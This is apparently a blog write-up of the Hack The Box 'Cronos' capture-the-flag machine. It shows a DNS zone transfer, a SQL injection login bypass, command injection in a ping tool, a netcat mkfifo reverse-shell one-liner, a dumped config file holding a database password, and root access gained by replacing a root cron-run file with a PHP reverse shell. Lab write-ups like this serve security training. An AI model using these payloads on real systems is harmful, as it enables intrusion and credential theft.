hackthebox – cronos – linux

Starting with masscan

# masscan -e tun0 -p1-65535 --rate=1000

Starting masscan 1.0.6 (http://bit.ly/14GZzcT) at 2019-07-05 14:21:44 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 53/tcp on                                     
Discovered open port 22/tcp on                                     
Discovered open port 80/tcp on  

port 53 is open which is for DNS. Lets see if we can transfer zones

# dig axfr @ cronos.htb

; <<>> DiG 9.11.4-2-Debian <<>> axfr @ cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.		604800	IN	NS	ns1.cronos.htb.
cronos.htb.		604800	IN	A
admin.cronos.htb.	604800	IN	A
ns1.cronos.htb.		604800	IN	A
www.cronos.htb.		604800	IN	A
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 155 msec
;; WHEN: Fri Jul 05 10:34:31 EDT 2019
;; XFR size: 7 records (messages 1, bytes 203)

We discovered cronos.htb and admin.cronos.htb domains. Insert following in /etc/hosts file cronos.htb. admin.cronos.htb www.cronos.htb

Browse both domains

hackthebox – cronos – laravel

…. and admin domain

hackthebox – cronos – admin

Use a few common techniques to enter/bypass login like admin/admin, guest/guest, etc and finally tried with SQLi which worked.

Use following in username and you can put anything as pass

admin' OR 1=1 #

… and we are in

hackthebox – cronos – net tool

Looks like someone made a net tool for traceroute and ping. We can try to inject command as following; ls

This worked and we were able to list files.

hackthebox – cronos – command injection

Lets get a shell for us.

Insert following instead of ls;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f

We get the shell

# nc -lvnp  4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 44144
/bin/sh: 0: can't access tty; job control turned off
$ whoami

Upgrade the shell

Lets get around

[email protected]:/var/www/admin$ cat config.php
   define('DB_SERVER', 'localhost');
   define('DB_USERNAME', 'admin');
   define('DB_PASSWORD', 'kEjdbRigfBHUREiNSDs');
   define('DB_DATABASE', 'admin');
[email protected]:/var/www/laravel$ cat .env


[email protected]:/home$ ls

We see few password and the user is noulis

Playing around we see a cronjob which is run by root user every minute.

* * * * *	root	php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

Looking at the permission, we can write the file directly

ls -lh /var/www/laravel/artisan
-rwxr-xr-x 1 www-data www-data 3.4K Jul  6 07:31 /var/www/laravel/artisan

Replace artisan with /usr/share/webshells/php/php-reverse-shell.php in kali, listen for shell and we will get the shell soon.

# nc -lvnp 1234
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 33728
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 18:40:01 up  3:45,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             [email protected]   IDLE   JCPU   PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# python -c 'import pty;pty.spawn("/bin/bash")'
[email protected]:/# whoami

Leave a Reply

Your email address will not be published. Required fields are marked *